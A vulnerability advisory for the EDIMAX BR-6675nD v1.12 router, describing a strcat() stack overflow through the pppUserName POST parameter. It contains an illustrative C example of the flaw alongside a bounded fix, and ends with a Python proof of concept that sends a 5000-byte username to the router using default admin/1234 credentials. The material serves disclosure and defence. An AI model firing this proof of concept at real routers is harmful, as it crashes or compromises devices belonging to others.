Overview

Affected version

BR-6675nD v1.12

Vulnerability details

The EDIMAX BR-6675nD v1.12 firmware has a stack-based buffer overflow in the formPPPoESetup function. The variable v35 receives the pppUserName parameter from a POST request; because the user controls the content of pppUserName, the strcat() call can overflow the buffer.
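To make the described defect concrete, the following C program is an added example (not the firmware's code, and written for this page rather than taken from the advisory): a hypothetical reconstruction of the strcat()-into-fixed-buffer pattern, placed beside a bounded replacement and a handler-side length check. The function names, the buffer size NAME_BUF, the policy limit MAX_PPP_USER_NAME and the "username=" prefix are all assumptions chosen for illustration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define NAME_BUF 64            /* assumed size of the stack buffer */
#define MAX_PPP_USER_NAME 32   /* assumed policy limit for pppUserName */

/* "Before": hypothetical reconstruction of the pattern the advisory
 * describes. strcat() copies until the source's NUL, so a pppUserName
 * longer than the remaining space writes past the end of buf. */
static void build_unbounded(char *buf, const char *user_name)
{
    strcpy(buf, "username=");
    strcat(buf, user_name);    /* no length check: the bug */
}

/* Length of s, never reading more than cap bytes. */
static size_t bounded_len(const char *s, size_t cap)
{
    size_t n = 0;
    while (n < cap && s[n] != '\0')
        n++;
    return n;
}

/* "After": append src to dst (capacity cap), refusing rather than
 * silently truncating when src plus its NUL does not fit. */
static bool append_bounded(char *dst, size_t cap, const char *src)
{
    size_t used = bounded_len(dst, cap);
    if (used == cap)                /* dst is not NUL-terminated */
        return false;
    size_t need = strlen(src);
    if (need >= cap - used)         /* no room for src and the NUL */
        return false;
    memcpy(dst + used, src, need + 1);
    return true;
}

/* Hardened handler: validate the parameter before any string routine
 * touches it. Returns 0 on success, -1 when the request is rejected;
 * out is always left NUL-terminated. */
int handle_pppoe_setup(const char *ppp_user_name, char *out, size_t out_cap)
{
    if (out == NULL || out_cap == 0)
        return -1;
    out[0] = '\0';
    if (ppp_user_name == NULL)
        return -1;
    if (strlen(ppp_user_name) > MAX_PPP_USER_NAME)
        return -1;                  /* reject, do not truncate */
    if (!append_bounded(out, out_cap, "username="))
        return -1;
    if (!append_bounded(out, out_cap, ppp_user_name))
        return -1;
    return 0;
}

/* Demo: an ordinary name is accepted and assembled intact. */
int demo_short_name(void)
{
    char out[NAME_BUF];
    if (handle_pppoe_setup("alice", out, sizeof out) != 0)
        return 0;
    return strcmp(out, "username=alice") == 0;
}

/* Demo: a 5000-byte name (the size the advisory's PoC sends) is refused
 * before a single byte is copied, and out is left empty. */
int demo_overlong_name(void)
{
    static char big[5001];          /* constructed input */
    char out[NAME_BUF];
    memset(big, 'A', 5000);
    big[5000] = '\0';
    return handle_pppoe_setup(big, out, sizeof out) == -1 && out[0] == '\0';
}

/* Demo: append_bounded fills exactly cap-1 bytes and refuses one more. */
int demo_exact_fit(void)
{
    char buf1[16] = "username=";    /* 9 bytes used, 6 + NUL remain */
    char buf2[16] = "username=";
    return append_bounded(buf1, sizeof buf1, "123456")
        && !append_bounded(buf2, sizeof buf2, "1234567");
}

int main(void)
{
    char legacy[NAME_BUF];
    build_unbounded(legacy, "alice");   /* benign input only */
    printf("unbounded, short input : %s\n", legacy);
    printf("short name accepted    : %d\n", demo_short_name());
    printf("5000-byte name rejected: %d\n", demo_overlong_name());
    printf("exact fit / one over   : %d\n", demo_exact_fit());
    return 0;
}
```

The two checks are deliberately separate: the policy limit rejects anything that is unreasonable for a PPPoE user name, and append_bounded protects the buffer even if a caller forgets the policy check, which is the layering a reviewer would look for when triaging similar CGI handlers.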


POC

import requests

ip = "192.168.2.1"  # LAN address of the router under test

# Oversized pppUserName: the handler appends it with strcat() into a
# fixed-size stack buffer, so a long value overruns that buffer.
payload = "A" * 5000
data = {
    "submit-url":     "",
    "pppConnect":     "",
    "pppConnect1":    "",
    "pppDisconnect":  "",
    "pppDisconnect1": "",
    "wanMode":        "",
    "pppServName":    "",
    "pppMTU":         "",
    "pppUserName":    payload,
}
url = f'http://{ip}/goform/formPPPoESetup'

# The endpoint requires HTTP authentication. A timeout keeps the script
# from hanging if the web server stops responding after the request.
try:
    res = requests.post(url=url, data=data, auth=("admin", "1234"), verify=False, timeout=5)
    print(res)
except requests.exceptions.RequestException as e:
    print(f"request failed (device may have stopped responding): {e}")
